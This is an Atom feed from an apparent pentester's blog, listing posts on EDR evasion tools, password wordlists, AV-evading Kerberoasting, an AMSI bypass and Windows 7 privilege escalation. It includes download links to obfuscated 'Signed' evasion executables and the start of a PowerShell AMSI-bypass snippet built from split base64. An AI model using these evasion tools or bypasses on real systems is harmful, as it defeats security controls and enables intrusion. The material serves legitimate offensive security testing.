<feed xmlns="http://www.w3.org/2005/Atom"> <id>https://sp00ks-git.github.io/</id><title>A Pentesters Ramblings</title><subtitle>A way to recall methodologies, during engagements when a specific challenge or cirumstance presents itself.</subtitle> <updated>2023-08-19T21:39:25+01:00</updated> <author> <name>sp00ks</name> <uri>https://sp00ks-git.github.io/</uri> </author><link rel="self" type="application/atom+xml" href="https://sp00ks-git.github.io/feed.xml"/><link rel="alternate" type="text/html" hreflang="en" href="https://sp00ks-git.github.io/"/> <generator uri="https://jekyllrb.com/" version="4.3.2">Jekyll</generator> <rights> © 2023 sp00ks </rights> <icon>/assets/img/favicons/favicon.ico</icon> <logo>/assets/img/favicons/favicon-96x96.png</logo> <entry><title>Evasion Tools</title><link href="https://sp00ks-git.github.io/posts/evasion-tools/" rel="alternate" type="text/html" title="Evasion Tools" /><published>2023-07-16T09:50:00+01:00</published> <updated>2023-08-19T21:38:24+01:00</updated> <id>https://sp00ks-git.github.io/posts/evasion-tools/</id> <content src="https://sp00ks-git.github.io/posts/evasion-tools/" /> <author> <name>sp00ks</name> </author> <category term="tools" /> <summary> A list of tools to bypass EDR using a variety of evasion techniques. PwnPowerShell GH - Signed - https://github.com/sp00ks-git/obfuscated-Encrypted-2023/raw/gh-pages/pjutvtn.exe.Signed.exe MU - Signed - https://mega.nz/file/e2gwGIJS#ivCiaYAmi_w_PZz5EPGrehJ2GPlUgEOY1kNphx0nkeQ GH - Un-Signed - https://github.com/sp00ks-git/obfuscated-Encrypted-2023/blob/gh-pages/InteractivePS-defender-c... </summary> </entry> <entry><title>Wordlists</title><link href="https://sp00ks-git.github.io/posts/wordlist/" rel="alternate" type="text/html" title="Wordlists" /><published>2023-07-15T21:35:00+01:00</published> <updated>2023-07-15T22:17:44+01:00</updated> <id>https://sp00ks-git.github.io/posts/wordlist/</id> <content src="https://sp00ks-git.github.io/posts/wordlist/" /> <author> <name>sp00ks</name> </author> <category term="tools" /> <summary> WORDLISTS Suggested Wordlists download links (HTTP) - working as of 14/10/2019 (maybe out of date now but some should still be working) rockyou - https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt (~14,300,000 words) rocktastic12a - http://www.mediafire.com/file/9tf3n2d45tgktq1/Rocktastic12a.7z/file (1.37GB - Compressed) dictionary_words - https://github.... </summary> </entry> <entry><title>Encrypted SPN Scanning</title><link href="https://sp00ks-git.github.io/posts/Encrypted-SPN-Scanning/" rel="alternate" type="text/html" title="Encrypted SPN Scanning" /><published>2023-03-20T21:00:00+00:00</published> <updated>2023-07-15T20:15:24+01:00</updated> <id>https://sp00ks-git.github.io/posts/Encrypted-SPN-Scanning/</id> <content src="https://sp00ks-git.github.io/posts/Encrypted-SPN-Scanning/" /> <author> <name>sp00ks</name> </author> <category term="techniques" /> <summary> Encrypted SPN Scanning and Cipher extraction whilst evading AntiVirus Usually SPN scanning involves using tools such as Rubeus. However as these are common and AV is looking for fingerprints of these tools and not just the type of traffic that is being requested (AS-REQ) in my experience this is a better option for Kerberoasting. The powershell script of choice was made by CyberArk over 7 yea... </summary> </entry> <entry><title>AMSI</title><link href="https://sp00ks-git.github.io/posts/amsi/" rel="alternate" type="text/html" title="AMSI" /><published>2022-06-25T21:42:00+01:00</published> <updated>2023-03-02T22:06:00+00:00</updated> <id>https://sp00ks-git.github.io/posts/amsi/</id> <content src="https://sp00ks-git.github.io/posts/amsi/" /> <author> <name>sp00ks</name> </author> <category term="techniques" /> <summary> A M S I ${01001011100110010} = [Convert]::FromBase64String("TV"+"qQAAM"+"AAAAEAAAA//8A"+"ALgAAAAAAAAAQAA"+"AAAAAAAAAAAAAAAAAA"+"AAAAAAAAAAAAAAAAAA"+"AAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAPszD4AAAAAAAAAAAOAAIiALATAAAIwBAAAGAAAAAAAArqsBAAAgAAAAwAEAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAAAAAgAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEA... </summary> </entry> <entry><title>Win7 LPE</title><link href="https://sp00ks-git.github.io/posts/Win7-LPE/" rel="alternate" type="text/html" title="Win7 LPE" /><published>2021-10-31T13:10:00+00:00</published> <updated>2022-06-26T20:52:28+01:00</updated> <id>https://sp00ks-git.github.io/posts/Win7-LPE/</id> <content src="https://sp00ks-git.github.io/posts/Win7-LPE/" /> <author> <name>sp00ks</name> </author> <category term="techniques" /> <summary> It is less common than it used to be to find Windows 7 Operating systems in place, have they are still found across domains. Sometimes forbespoke applciatiosn or services that can’t be ported onto upto date Operating Systems for ‘reasons’. I had this scenario on an engagement where I was in an office presented with a Windows7 Desktop, it was a BlackBox unautenticated test and the idea was to s... </summary> </entry> </feed>
